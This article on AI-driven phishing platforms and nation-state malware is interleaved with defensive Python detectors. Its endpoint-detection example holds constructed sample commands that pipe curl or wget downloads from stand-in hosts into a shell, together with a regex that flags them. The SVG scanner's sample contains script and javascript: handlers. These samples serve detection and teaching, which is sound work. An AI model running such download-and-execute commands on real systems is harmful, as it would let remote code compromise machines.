The Attacker's Productivity Revolution
In November 2024, AI-generated phishing emails were 10% less effective than those written by elite human social engineers. Four months later, in March 2025, they were 24% more effective.
That crossover happened faster than almost anyone predicted. It also happened quietly: no press release, no industry announcement, no regulatory response. The Hoxhunt longitudinal study that documented it was read carefully by security researchers and largely ignored by everyone else.
The attackers noticed.
The Platform Economy of Cybercrime
Tycoon 2FA is not a hacking group. It is a subscription service.
For approximately $120 per ten days, any buyer, regardless of technical skill, gets access to a phishing platform with Microsoft 365 and Gmail bypass built in as a feature. The platform handles the infrastructure, the evasion layer, the credential harvesting, and the session token capture that defeats multi-factor authentication after the victim has already logged in. The buyer supplies the target list and collects the results.
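The session-token capture described above leaves a footprint a defender can look for: the victim completes password and MFA through the proxy, and minutes later the same session token is presented from attacker infrastructure on a different network. The following is an added example, not code from the original article or from any vendor: it correlates constructed sign-in records (the key=value format, field names and sample lines are all assumptions made here) and flags sessions whose token is reused from a different ASN than the interactive login that created it, within a short window.

```python
"""Flag sign-in sessions replayed from a different network shortly after the
interactive (password + MFA) login that created them: the pattern an
adversary-in-the-middle phishing kit leaves behind.

The key=value log format and the sample lines below are constructed for
this example; map the fields to your identity provider's sign-in log."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class SignIn:
    ts: datetime
    user: str
    session_id: str
    src_ip: str
    asn: str
    kind: str  # "interactive" = password + MFA completed; "token" = session token presented


def parse_signins(lines):
    """Parse constructed key=value sign-in records into SignIn objects, oldest first."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        f = dict(kv.split("=", 1) for kv in line.split())
        events.append(SignIn(ts=datetime.fromisoformat(f["ts"]), user=f["user"],
                             session_id=f["session"], src_ip=f["ip"],
                             asn=f["asn"], kind=f["kind"]))
    return sorted(events, key=lambda e: e.ts)


def find_session_replay(events, window_minutes=60):
    """Return {session_id: (interactive_login, replay)} for every session whose
    token is presented from a different ASN than the interactive login,
    within window_minutes of that login."""
    first_seen = {}   # session_id -> the interactive login that minted it
    hits = {}
    for e in events:
        if e.kind == "interactive" and e.session_id not in first_seen:
            first_seen[e.session_id] = e
        elif e.kind == "token" and e.session_id in first_seen:
            origin = first_seen[e.session_id]
            if (e.asn != origin.asn
                    and e.ts - origin.ts <= timedelta(minutes=window_minutes)
                    and e.session_id not in hits):
                hits[e.session_id] = (origin, e)
    return hits


# Constructed sample: alice's token is replayed from another ASN 3 minutes after
# login; bob's token stays on the same network; carol's reuse is a day later.
SAMPLE_LOG = """
ts=2025-03-04T09:00:12 user=alice session=s-1001 ip=203.0.113.10 asn=AS64500 kind=interactive
ts=2025-03-04T09:03:40 user=alice session=s-1001 ip=198.51.100.7 asn=AS64511 kind=token
ts=2025-03-04T09:05:00 user=bob session=s-1002 ip=203.0.113.22 asn=AS64500 kind=interactive
ts=2025-03-04T09:40:00 user=bob session=s-1002 ip=203.0.113.22 asn=AS64500 kind=token
ts=2025-03-04T10:00:00 user=carol session=s-1003 ip=203.0.113.31 asn=AS64500 kind=interactive
ts=2025-03-05T10:00:00 user=carol session=s-1003 ip=192.0.2.9 asn=AS64496 kind=token
"""

if __name__ == "__main__":
    for sid, (origin, replay) in find_session_replay(parse_signins(SAMPLE_LOG.splitlines())).items():
        print(f"{origin.user}: session {sid} minted from {origin.asn} at {origin.ts:%H:%M}, "
              f"replayed from {replay.asn} ({replay.src_ip}) at {replay.ts:%H:%M}")
```

Treat a hit as a triage signal rather than a verdict: mobile carriers and VPN egress change ASNs legitimately, so pair this with device identity, user agent and impossible-travel checks, and make the response a session revocation plus forced re-authentication rather than a password reset alone, since the password is not what the attacker is holding.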
By mid-2025, Tycoon 2FA accounted for 62% of all phishing attempts blocked by Microsoft: more than 30 million malicious emails in a single month. The platform was linked to an estimated 96,000 distinct victims worldwide since 2023, including more than 55,000 Microsoft customers. A global coalition led by Microsoft and Europol seized 330 domains powering the platform’s infrastructure in March 2026 and filed a civil complaint against alleged creator Saad Fridi demanding a $10 million injunction.
The takedown happened after the damage was done. The platform operated for years. A financial services firm breached in early 2025 was one of thousands of victims who never saw law enforcement intervention in time to matter: its employees received convincing phishing emails impersonating internal departments, entered credentials and MFA codes into near-identical Microsoft login portals, and watched attackers exfiltrate sensitive client data using authenticated sessions that bypassed every subsequent security check.
The lesson is not that law enforcement eventually acts. It is that the attacker productivity revolution had already run its course before anyone moved to stop it.
Why Your Technical Controls Are Failing
The instinct in most organizations is to treat phishing as a human awareness problem. Train the employees. Run simulations. Remind people not to click suspicious links.
That framing is now structurally inadequate, and the technical data explains why.
AI-generated phishing content surged from less than 5% of monthly phishing attempts to 56% between 2025 and early 2026 — a fourteen-fold increase in roughly eighteen months. Per Crowe’s January 2026 testing, AI-generated phishing emails produced a false negative rate of 78% in traditional email gateways, compared to 32% for human-written samples. The content is syntactically correct, contextually appropriate, grammatically perfect, and personally relevant in ways that rule-based filters were never designed to detect.
The evasion mechanisms are specific and worth understanding. Tycoon 2FA’s 2025 version introduced Hangul Filler characters (invisible Unicode elements) to encode malicious URLs in ways that bypass signature-based detection. Seventy-seven percent of phishing domains now carry valid SSL certificates, defeating certificate-based filtering. Dynamic short links ensure each URL is used once, preventing blacklist accumulation. Polymorphic PDF attachments carry the same semantic content with different binary fingerprints each time, defeating hash-based detection.
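The Hangul Filler trick works because the padded URL differs byte-for-byte from every known-bad entry while rendering identically. The defender's counter is to canonicalise before matching. The following is an added example written for this article, not code from Tycoon 2FA's analysts or from any email security product: it lists the invisible code points that matter, flags and strips them from a URL, and then checks whether the host still changes under NFKC normalisation. The sample URLs are constructed.

```python
"""Flag and strip invisible or zero-width code points from URLs before they
are matched against blocklists.  The Hangul Filler (U+3164) and its two
Jamo cousins are classified as letters, not as format characters, so a
check on Unicode category "Cf" alone misses them; hence the explicit set.

Sample URLs below are constructed for this example."""
import unicodedata
from urllib.parse import urlsplit

INVISIBLE = {
    "\u3164",  # HANGUL FILLER (category Lo, renders as nothing)
    "\u115f",  # HANGUL CHOSEONG FILLER
    "\u1160",  # HANGUL JUNGSEONG FILLER
    "\u200b", "\u200c", "\u200d",  # zero-width space / non-joiner / joiner
    "\u2060",  # WORD JOINER
    "\ufeff",  # zero-width no-break space (BOM)
    "\u00ad",  # SOFT HYPHEN
}


def _is_invisible(ch):
    return ch in INVISIBLE or unicodedata.category(ch) == "Cf"


def invisible_codepoints(s):
    """Return a list of (index, 'U+XXXX', name) for each invisible character in s."""
    return [(i, f"U+{ord(ch):04X}", unicodedata.name(ch, "UNNAMED"))
            for i, ch in enumerate(s) if _is_invisible(ch)]


def strip_invisible(s):
    return "".join(ch for ch in s if not _is_invisible(ch))


def triage_url(url):
    """Return (is_suspicious, cleaned_url, findings).

    A URL is suspicious if it carried invisible characters, or if its host
    still changes under NFKC normalisation after cleaning (compatibility
    forms in a label that a browser would fold into ASCII)."""
    findings = invisible_codepoints(url)
    cleaned = strip_invisible(url)
    host = urlsplit(cleaned).hostname or ""
    if unicodedata.normalize("NFKC", host) != host:
        findings.append((-1, "NFKC", "host changes under NFKC normalisation"))
    return (bool(findings), cleaned, findings)


# Constructed samples: padded path, clean URL, zero-width character inside the host.
SAMPLES = [
    "https://login.example.com/\u3164\u3164account/verify?id=7",
    "https://login.example.com/account/verify?id=7",
    "https://exam\u200bple.com/reset",
]

if __name__ == "__main__":
    for url in SAMPLES:
        suspicious, cleaned, findings = triage_url(url)
        print(f"{'SUSPICIOUS' if suspicious else 'clean     '} {cleaned}  {findings}")
```

Run the cleaned form, not the raw one, through your URL reputation and blocklist lookups, and log the raw bytes alongside it: the presence of these characters in a URL is itself a strong signal, because no legitimate link generator inserts Hangul Fillers into a path.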
The newest vectors don’t use links or attachments at all. The ATHR platform, sold for $4,000 plus 10% of attacker profits, sends emails containing only a phone number. When a victim calls, they reach either a human operator or an AI voice agent following a structured script designed to extract verification codes. Traditional secure email gateways were never built to detect a phone number as a threat vector. Malicious calendar invites embedded in ICS files bypass the SMTP filter layer entirely and write directly to calendar applications, with a victim click rate six times higher than baseline phishing.
SVG files (XML-based text files that can contain JavaScript) have become the third most popular malicious attachment type specifically because email security tools scan them less aggressively than executables. When previewed in an email client, embedded scripts execute and trigger redirects or malware downloads without the victim opening a traditional attachment.
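Because an SVG is XML, the active content a previewer would execute is visible to a parser before any rendering happens. The following is an added example, not code from the article's author or from any gateway product: it walks an SVG document and reports script elements, event-handler attributes, javascript: and data: references, foreignObject wrappers and remote fetches. The two sample SVGs are constructed; the element and attribute names are standard SVG.

```python
"""Report active content in an SVG attachment before it reaches a previewer.
Sample documents are constructed; element/attribute names are standard SVG."""
import re
import xml.etree.ElementTree as ET


def _local(name):
    """Strip an XML namespace prefix: '{ns}href' -> 'href'."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_bytes, max_bytes=2_000_000):
    """Return human-readable findings; an empty list means nothing active was seen."""
    if len(svg_bytes) > max_bytes:          # size cap against entity-expansion bombs
        return ["oversized SVG; treat as suspicious"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); treat as suspicious"]

    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            findings.append("<script> element")
        elif name == "foreignobject":
            findings.append("<foreignObject> element (can embed HTML)")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.startswith("on"):      # onload, onclick, onbegin, ...
                findings.append(f"event handler {aname}= on <{name}>")
            if aname == "href":
                # Browsers ignore embedded tabs/newlines when parsing a scheme,
                # so strip whitespace before looking at it.
                compact = re.sub(r"\s", "", value)
                scheme = compact.split(":", 1)[0].lower() if ":" in compact else ""
                if scheme in ("javascript", "data", "vbscript"):
                    findings.append(f"{scheme}: URL on <{name}>")
                elif scheme in ("http", "https") and name in ("a", "image", "use", "script"):
                    findings.append(f"remote {scheme} reference on <{name}>")
    return findings


# Constructed samples.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="navy"/>
</svg>"""

ACTIVE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script>init();</script>
  <a xlink:href="java&#10;script:init()"><text x="1" y="9">Open document</text></a>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("active", ACTIVE_SVG)):
        print(label, svg_findings(doc) or "no active content")
```

Any finding is reason to rewrite the attachment to a rasterised preview or quarantine it; there is no business case for script in an emailed image. Python's ElementTree does not resolve external entities, but it will still expand internal entity bombs, so keep the size cap or parse with defusedxml in production.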
The technical arms race has moved decisively in the attacker’s direction. The controls most organizations rely on were designed for a threat landscape that no longer exists.
The Democratization of Nation-State Capability
Until recently, the sophistication gap between organized criminal groups and nation-state threat actors was meaningful. Nation-states had resources, patience, and technical depth that criminal operators couldn’t match. That gap is closing faster than most security teams have adjusted for.
The NGate malware, discovered by ESET Research in April 2026, trojanizes the legitimate Android HandyPay application to relay NFC data from victims’ payment cards to attacker devices, enabling contactless ATM cash-outs and PIN capture. The malicious code shows signs of AI-generated authorship; specifically, the malware logs contain an emoji characteristic of AI-generated text output. The attackers chose to build custom malware rather than pay $400 to $500 per month for existing Malware-as-a-Service kits. With AI, the development cost dropped to near zero.
The HONESTCUE malware, identified by Google’s Threat Intelligence Group in September 2025, calls Gemini’s API during execution and receives C# source code as the response, then downloads and executes the next-stage payload. The malware generates small iterative variations across samples, suggesting attackers testing antivirus detection in near real-time. Traditional signature-based detection cannot keep pace with a malware family that rewrites itself on demand using a commercial AI API.
These are not isolated incidents. Google’s February 2026 threat intelligence report documented confirmed AI tool use by APT42 (Iran), UNC2970 (North Korea), and TEMP.Hex (China) across reconnaissance, persona development, phishing kit generation, and vulnerability research. APT42 uses Gemini to search for target email addresses, generate cultural context for phishing lures, and craft targeted personas. UNC2970 synthesizes OSINT on defense contractor employees, mapping job roles and salary data to identify high-value targets. TEMP.Hex compiles detailed profiles on specific individuals and uses AI-generated personas to trial security bypass techniques.
Per my practice running OSINT-based investigations for M&A clients: the tools nation-state actors are using for targeting are the same tools legitimate investigators use for due diligence. The difference is authorization and intent, not capability. That parity is new, and it is consequential.
What 29 Minutes Actually Means
CrowdStrike’s 2026 Global Threat Report documents an average eCrime breakout time of 29 minutes — the window between initial access and lateral movement into the broader network. The fastest observed breakout was 27 seconds. Data exfiltration began within four minutes of initial access in one documented intrusion.
These numbers define the defender’s operational window. An attacker who obtains valid credentials through a Tycoon 2FA session — which captures both the password and the authenticated session token simultaneously — can be moving laterally through a corporate network before most security operations centers have processed the initial alert.
The financial services sector, which is directly relevant to the M&A and CISO readers of this series, faces a compounded version of this problem. Average breach cost in financial services runs $6.08 million per incident, the highest of any industry. AI-related breaches average $14.6 million — more than triple the baseline. Seventy-six percent of U.S. financial firms reported payments fraud in 2025, with AI-assisted attacks contributing significantly to the volume.
UNC1069, a North Korean nexus threat actor investigated by Mandiant, targeted a fintech entity in the cryptocurrency sector using a sequence that illustrates how these capabilities combine in practice. The victim was contacted via a compromised Telegram account belonging to a cryptocurrency executive. Rapport was established over time, then a Calendly link for a meeting directed the victim to attacker-controlled infrastructure. On the call, the victim was presented with a deepfake video of a CEO from another cryptocurrency company. The “audio issues” that followed prompted the victim to run troubleshooting commands containing a curl pipe to shell — initiating infection. Seven distinct malware families were deployed on a single host. DEEPBREATH, a Swift-based payload, then manipulated the TCC database to harvest Keychain credentials, browser data, Telegram data, and Apple Notes. A malicious browser extension masquerading as a Google Docs offline editor recorded keystrokes and extracted cookies.
This is not exceptional. This is documented operational practice by a mid-tier nation-state actor, using commercially available AI tools, against a target in a sector your clients operate in.
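Two steps in the UNC1069 chain above are visible on the endpoint regardless of how convincing the deepfake was: a download tool piped straight into a shell, and a process other than the system's own TCC daemon writing to the TCC database. The following is an added example, not code from Mandiant or from the article's author: it runs both detections over constructed endpoint records. The record format, the process names and the sample lines are assumptions made here; the com.apple.TCC/TCC.db path is macOS's real location for that database.

```python
"""Two endpoint detections for the macOS intrusion chain described above:
  1. a download utility (curl/wget) piped directly into a shell;
  2. a write to the TCC consent database by a process other than tccd.

Record format ("kind|process|detail") and all sample lines are constructed
for this example."""
import re
from dataclasses import dataclass

# curl/wget ... | [sudo] sh|bash|zsh|dash   (stops at ; or & so a later pipe
# in an unrelated command does not join two statements together)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.IGNORECASE)
TCC_DB = re.compile(r"/com\.apple\.TCC/TCC\.db$")
EXPECTED_TCC_WRITERS = {"tccd"}   # assumption: only the TCC daemon should touch the file


@dataclass
class Event:
    kind: str      # "exec" or "file_write"
    process: str   # process image name
    detail: str    # command line for exec, target path for file_write


def parse_events(lines):
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        kind, process, detail = line.split("|", 2)   # detail may itself contain '|'
        events.append(Event(kind, process, detail))
    return events


def detect(events):
    """Return a list of (rule, process, detail) alerts."""
    alerts = []
    for e in events:
        if e.kind == "exec" and PIPE_TO_SHELL.search(e.detail):
            alerts.append(("download-piped-to-shell", e.process, e.detail))
        elif (e.kind == "file_write" and TCC_DB.search(e.detail)
              and e.process not in EXPECTED_TCC_WRITERS):
            alerts.append(("tcc-db-write-by-unexpected-process", e.process, e.detail))
    return alerts


# Constructed sample records.
SAMPLE_EVENTS = """
exec|zsh|curl -fsSL https://support-tool.invalid/fix.sh | sh
exec|zsh|curl -O https://files.example.com/report.pdf
exec|Terminal|/bin/bash -c "wget -qO- https://cdn.example.net/setup | sudo bash"
exec|zsh|ls -la | grep sh
file_write|tccd|/Users/dev/Library/Application Support/com.apple.TCC/TCC.db
file_write|updater|/Users/dev/Library/Application Support/com.apple.TCC/TCC.db
"""

if __name__ == "__main__":
    for rule, process, detail in detect(parse_events(SAMPLE_EVENTS.splitlines())):
        print(f"[{rule}] {process}: {detail}")
```

The first rule will fire on developers who install tooling this way, so scope it to non-engineering hosts or raise severity when the download host is newly registered. The second is the higher-fidelity signal: TCC.db is protected by System Integrity Protection, and a non-Apple process reaching it has already obtained Full Disk Access or found a way around that protection, which is an incident either way.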
The Question Your Controls Need to Answer
The attacker’s productivity revolution is not a future threat. It arrived in 2025 and the data documents its operational impact precisely.
The organizations facing the greatest exposure are those whose security posture was calibrated for the 2022 threat landscape: rule-based email filtering, single-factor or SMS-based MFA, signature detection for malware, and employee awareness training as the primary phishing defense. Each of those controls has been structurally degraded by the AI productivity shift documented above.
Phishing-resistant MFA (FIDO2 and WebAuthn implementations that cannot be captured by adversary-in-the-middle proxies) is the minimum credential protection baseline for 2026, not an advanced security measure. Organizations still relying on SMS or push-notification MFA are operating with a known bypass available on a $120 ten-day subscription.
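The reason a proxy cannot capture a WebAuthn login is worth seeing at the data level. The browser refuses to use a credential unless the page's origin belongs to the credential's relying party ID, and the authenticator signs the origin it actually saw together with the server's challenge, so a response produced on a look-alike domain fails the relying party's checks even if the kit relays the genuine challenge. The following is an added teaching model, not a WebAuthn library and not code from any vendor: the ECDSA signature is stood in for by an HMAC keyed with a per-credential secret (so it runs with the standard library alone), authenticatorData is reduced to rpIdHash plus a flags byte, and the relying party ID, origins and challenge are constructed.

```python
"""Teaching model of WebAuthn origin binding.  The signature is an HMAC with
a per-credential secret in place of ECDSA, and authenticatorData is reduced
to rpIdHash || flags; the verification ORDER and the fields checked match
what a relying party does.  RP ID, origins and challenge are constructed."""
import base64
import hashlib
import hmac
import json
import os
from urllib.parse import urlsplit


def b64u(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def unb64u(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def browser_allows(rp_id, origin):
    """The browser's gate: the origin's host must equal the RP ID or be a
    subdomain of it, otherwise the credential is never offered."""
    host = urlsplit(origin).hostname or ""
    return host == rp_id or host.endswith("." + rp_id)


class Authenticator:
    """One credential registered to rp_id; 'secret' stands in for the private key."""
    def __init__(self, rp_id):
        self.rp_id = rp_id
        self.secret = os.urandom(32)

    def get_assertion(self, challenge, origin):
        # clientData.origin is filled in by the browser from the URL it is on;
        # script on the page cannot change it.
        client_data = json.dumps({"type": "webauthn.get",
                                  "challenge": b64u(challenge),
                                  "origin": origin}).encode()
        auth_data = hashlib.sha256(self.rp_id.encode()).digest() + b"\x01"  # rpIdHash || UP flag
        signed = auth_data + hashlib.sha256(client_data).digest()
        sig = hmac.new(self.secret, signed, "sha256").digest()
        return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": sig}


def verify_assertion(assertion, secret, expected_rp_id, expected_origin, issued_challenge):
    """Relying-party checks in server order; returns (ok, reason)."""
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if unb64u(cd.get("challenge", "")) != issued_challenge:
        return False, "challenge mismatch"
    if cd.get("origin") != expected_origin:
        return False, f"origin mismatch: {cd.get('origin')!r}"
    ad = assertion["authenticatorData"]
    if ad[:32] != hashlib.sha256(expected_rp_id.encode()).digest():
        return False, "rpIdHash mismatch"
    if not ad[32] & 0x01:
        return False, "user-presence flag not set"
    signed = ad + hashlib.sha256(assertion["clientDataJSON"]).digest()
    if not hmac.compare_digest(hmac.new(secret, signed, "sha256").digest(), assertion["signature"]):
        return False, "bad signature"
    return True, "ok"


RP_ID = "example.com"                                # constructed
GENUINE_ORIGIN = "https://login.example.com"         # constructed
PROXY_ORIGIN = "https://login.example-com.invalid"   # constructed look-alike


def demo():
    auth = Authenticator(RP_ID)
    challenge = os.urandom(32)   # issued by the genuine server, relayed unchanged by a proxy
    results = {"browser_gate_genuine": browser_allows(RP_ID, GENUINE_ORIGIN),
               "browser_gate_proxy": browser_allows(RP_ID, PROXY_ORIGIN)}
    results["direct"] = verify_assertion(auth.get_assertion(challenge, GENUINE_ORIGIN),
                                         auth.secret, RP_ID, GENUINE_ORIGIN, challenge)
    # Even if the browser gate were somehow bypassed, the signed origin gives it away.
    results["proxied"] = verify_assertion(auth.get_assertion(challenge, PROXY_ORIGIN),
                                          auth.secret, RP_ID, GENUINE_ORIGIN, challenge)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Contrast this with a one-time code or a push approval: neither carries the origin, so the proxy simply forwards whatever the victim produces. The protection here depends on the relying party actually comparing origin and rpIdHash against its own configured values; a deployment that accepts any origin has re-created the weakness in software.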
Per my experience conducting pre-acquisition security assessments: the credential exposure question is now the first question, not a secondary check. Seventy-nine percent of successful intrusions use valid credentials as the entry point. The secondary market for those credentials, as we examined in an earlier piece in this series, ensures that a breach from 2022 is still generating usable access in 2026.
The attacker has a productivity advantage. The question is whether your organization has closed enough of the gap to make the attack economically unattractive relative to softer targets.
At 29 minutes average breakout time, the answer to that question is determined before most security teams know there is a question to answer.
Next in The Familiar Fire: The $25 Million Meeting — the Arup heist documented how a video call full of deepfake participants cost $25 million. In 2026, the attacks have evolved from video calls to data rooms. AI-generated due diligence documents are already passing initial review.